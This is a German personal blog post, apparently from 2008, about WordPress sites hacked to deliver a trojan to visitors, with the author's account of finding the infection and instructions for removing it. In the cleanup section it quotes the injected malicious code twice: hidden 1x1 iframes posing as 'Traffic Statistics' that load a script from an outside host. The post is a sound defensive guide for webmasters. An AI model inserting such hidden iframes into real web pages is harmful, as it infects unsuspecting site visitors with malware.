Schorschs World

Eine meiner am meisten gelesenen Beiträge ist zur Zeit der Artikel “Böser Code im WordPress Blog“. Zur Zeit wird dieser Beitrag bis zu 50 mal am Tag aufgerufen. Verzweifelte WordPress-Nutzer finden dort die Lösung zum Problem, wie sie ihr Blog von einem schadhaften Code befreien können, über den ein Schadprogramm auf die Computer ihrer Besucher geschleust wird. Zur Zeit ist dies offensichtlich verstärkt der Fall. Dies kann das “Aus” für eine Homepage bedeuten. Denn Google markiert die Seite als “attakierend gemeldete Seite”. Die modernen Browser blockieren die Website dann sofort. Sie kann nicht mehr aufgerufen werden und verliert ihre Besucher. Google gibt diese Erklärung ab, wenn man auf den Button “Warum wird diese Seite blockiert” …

Nicht bei allen Webmastern ruft dies große Freude hervor. Hat Google schon so viel Macht, dass die Internetfirma bestimmen kann, welche Seiten noch zugänglich sind oder nicht? Die Marke “gefährliche Homepage” erhält man schnell. Wie schnell wird man sie auch wieder los?

Private Blogbetreiber, deren Blog gehackt wurden, können oft nichts dafür, dass ihre Seite als Virenschleuder mißbraucht wird. Ich habe dies selbst bei zwei von mir verwalteten Seiten erlebt.  Andererseits ist es durchaus sinnvoll, dass solche Seiten “geblockt” werden. Schließlich gehen gerade von betroffenen Websites privater Betreiber, die für vertrauenswürdig gehalten werden, große Gefahren aus.

Möchten Sie, dass von einer von Ihnen betriebenen Homepage Schadprogramme aus verteilt werden, die die sensiblen Daten Ihrer Besucher ausspionieren? Ich nicht. Leider mußte ich feststellen, dass anderen Webmastern dies anscheinend egal war. Obwohl ihre Seite gehackt war, wurde sie keineswegs aus dem Netz genommen.

So schrieb mir zum Beispiel eine Marita, die in meinem Blog Hilfe in Sachen “Trojaner” fand, ihr Blog aber keineswegs zumindest zeitweise der Öffentlichkeit unzugänglich zu machen, solange er “infiziert” war :

Danke dir, aber so schnell wollte ich nun doch nicht die Seite aus dem Netz nehmen. Habe den Trojaner nun erfolgreich entfernt. Er saß in einer meiner 44 Datenbänke und es hat eine Menge Zeit gekostet den Eintrag zu finden. Aber dank dieses Threads wusste ich ja wonach ich suchen muss und somit ist er nun gekillt. *freu* Danke für diesen hilfreichen Thread!!!! DANKE!!!

Leider denken so viele “Webmaster”.  Wenn sie nicht selbst die weitere Verteilung gefährlicher Viren verhindern, ist es besser, wenn die “Internetkrake” Google das für die übernimmt.

(Diesen Artikel habe ich am 14. Juli 2008 ergänzt)

Wieder einmal bewahrt mich ein regelmäßiges Durchschauen  von mir abonnierter Feeds vor bösen Überraschungen. Unter anderem verfolge ich die Neuigkeiten auf Hoax Info Service, einem Service der Technischen Universität über Virengefahren aus dem Netz. (more…)

Mittlerweile ist es schon beim letzten Zeitgenossen angekommen, wie bequem es ist, Neuigkeiten per Email zu senden. Ich bekomme solche Rundschreiben von Vereinen, Musikerkollegen und Privatleuten. In absehbarer Zeit gibt es niemanden mehr, der nicht per Email erreichbar ist. Dann wird das elektronische Rundschreiben in jedem Verein Standart sein. Viele Versender solcher Nachrichten sind dabei häufig sehr gedankenlos im Umgang mit den Daten ihrer Empfänger.

(more…)

Trojaner-Warnungen können Nerven, Zeit und Kopfschmerzen kosten. Auf den von mir verwalteten WordPress-Blogs http://fv-bakum.de und http://feuerwehr-bakum.de schlich sich böser Code ein. Beide laufen auf einem auf einem 1&1-Webspace installierten WordPress-System. Besucher sprachen mich immer wieder darauf an, dass ein Trojaner auf meinen Seiten wäre.

Es handelte sich um den Trojaner “TR/Dldr.HTML.Agent.IS”. Falls Ihr Antivirenprogramm beim Besuch einer Internetseite alarmiert hat, benachrichtigen Sie bitte den Webmaster mit einem Hinweis auf diese Seite. Wie Sie als Webmaster diesen Trojaner aus Ihrem Blog entfernen können, erfahren Sie unten am Ende des Beitrags.

Ich konnte mir dies gar nicht denken, aber weil sich diese Warnungen häuften, beschloss ich der Sache auf den Grund zu gehen. Da ich aus Sicherheitsgründen immer mit dem Firefox-Browser von einem eingeschränkten Nutzerkonto aus ins Internet gehe, hat mich mein Antivirenprogramm Antivir nie vor einem gefährlichen Trojaner gewarnt. Anscheinend mag der den Firefox nicht.

Ich erkundigte zunächst mich im WordPress-Deutschland-Forum. Dort waren die Reaktionen erst ratlos. Ein Trojaner habe man nicht auf meinen Seiten gefunden. Einer fand aber dann doch eine solch gefährliche Warnung. Anscheinend surfen die Spezis in diesem Forum wohl auch nicht mit dem Internet Explorer.

Nun wechselte ich in das Administrationskonto und rief mit dem Internet Explorer 7 beide Seiten auf. Leider ist dies ja immer noch der übliche und ziemliche unsichere Weg des Normalnutzers von Computern in das Internet. Und sofort warnte mich Antivir: Das “Trojanische Pferd TR/Dldr.HTML.Agent.IS” verlangte den Zugriff auf meinen Rechner. Zur großen Darstellung der Warnung …

Ich hatte bereits Stunden verwandt, um alle Dateien meiner WordPress-Installationen (mit den dazu notwendigen Datensicherungen) auszutauschen. Jedoch war dies erfolglos. Der Trojaner wollte nicht weichen. Nach einigen Rückfragen im WordPressforum stellte sich heraus: Ein böser Code wurde einfach mit einem Verweis auf eine Script-Datei in meinen Beiträgen eingebettet, mit der anscheinend dieser Trojaner in fremde Rechner geschleust wird:

<iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> oder

<!– Traffic Statistics –> <iframe src=”http://61.155.8.157/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> <!– End Traffic Statistics –>

Wenn man diesen Quellcode glaubt man, es handle sich um eine Statistikfunktion von WordPress. Doch da irrt man gewaltig. Die DomainS wp-stats-php.info bzw. http://61.155.8.157 sind in   China registriert. Beim Aufruf eines derart infizierten Beitrags wundert man sich, dass die Ladezeit erheblich verlängert wird. In der Statuszeile des Browsers erscheint “wp-stats …info”. Da dies so ähnlich aussieht wie eine interne WordPress-Funktion, schöpft man nicht so schnell Verdacht, dass in diesem Moment ein Trojaner von einer chinesischen Quelle aus dem Rechner eingeschleust wird.

Ein einfacher Blick in den Seitenquelltext eines Beitrags reicht aus, diesen schädlichen Code in den Beiträgen sofort zu entdecken. Selbstverständlich habe ich die “infizierten” Beiträge sofort entfernt. Bei einem Update der WordPress-Installation werden die Beiträge nicht geändert. Deshalb konnte der schädliche Code beim Auswechseln der WordPress-Dateien auch nicht beseitigt werden sondern nur, indem man die betroffenen Beiträge entfernt.

Der Code versteckt sich im HTML-Code eines Beitrags, welcher nach Erzeugung durch das WordPress-Script in der mysql-Datenbank abgelegt und gespeichert wird. Wird der Beitrag aus der Datenbank abgefragt, wird auch wieder der in der Datenbank abgelegte böswillige und für den normalen Nutzer nicht sichtbare Code im Beitrag hinzugefügt. Der Code versteckt sich also in der Datenbank und nicht direkt in den Script-Dateien von WordPress.

Das gleiche Problem ist übrigens nicht nur bei WordPress-Blogs sondern auch bei Homepages, die mit Joomla verwaltet werden, aufgetreten.

Nur was soll man jetzt noch machen? Wo ist die Sicherheitslücke? Wie kommt dieser böse Quelltext in mein Blog? Wie kann man verhindern, das dieser Code sich so einfach in ein WordPress-Blog schleichen kann? Ich habe alle Dateien der Installation getauscht, meinen Rechner mit dem Antivirenprogramm Antivir gescannt. Nun weiß ich auch nicht, was ich sonst noch so tun kann.

Um den “Trojaner” aus Ihrem Blog zu löschen, rufen Sie mit Ihrem Browser die Seiten mit Ihren Beiträgen auf. Bei den WordPress-Blogs sind dies standartmäßig die Startseite und bei vielen Beiträgen die weiter gelinkten Fortsetzungsseiten. Nun müssen Sie sich den Quelltext dieser Seite ansehen. Klicken Sie dazu mit der rechten Maustaste auf die Seite und wählen Sie “Quellcode anzeigen” aus. Der Quellcode wird angezeigt. Schauen Sie nach, in welchem Beitrag der Quellcode

<iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe>” oder ähnlich, z.B.:

<!– Traffic Statistics –> <iframe src=”http://61.155.8.157/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> <!– End Traffic Statistics –>

vorhanden ist. Melden Sie sich jetzt in Ihren Blog an und löschen Sie den betreffenden Beitrag aus Ihrem Blog. Alternativ können Sie auch nur den böswilligen Code aus dem HTML-Code des befallenen Beitrag entfernen, wenn sie den Beitrag nicht löschen möchten.  Damit haben Sie den Code gelöscht, über den der Trojaner in Ihr Blog eindringt. Für die Folgen bei Anwendung dieses Hinweises übernimmt der Verfasser keinerlei Haftung.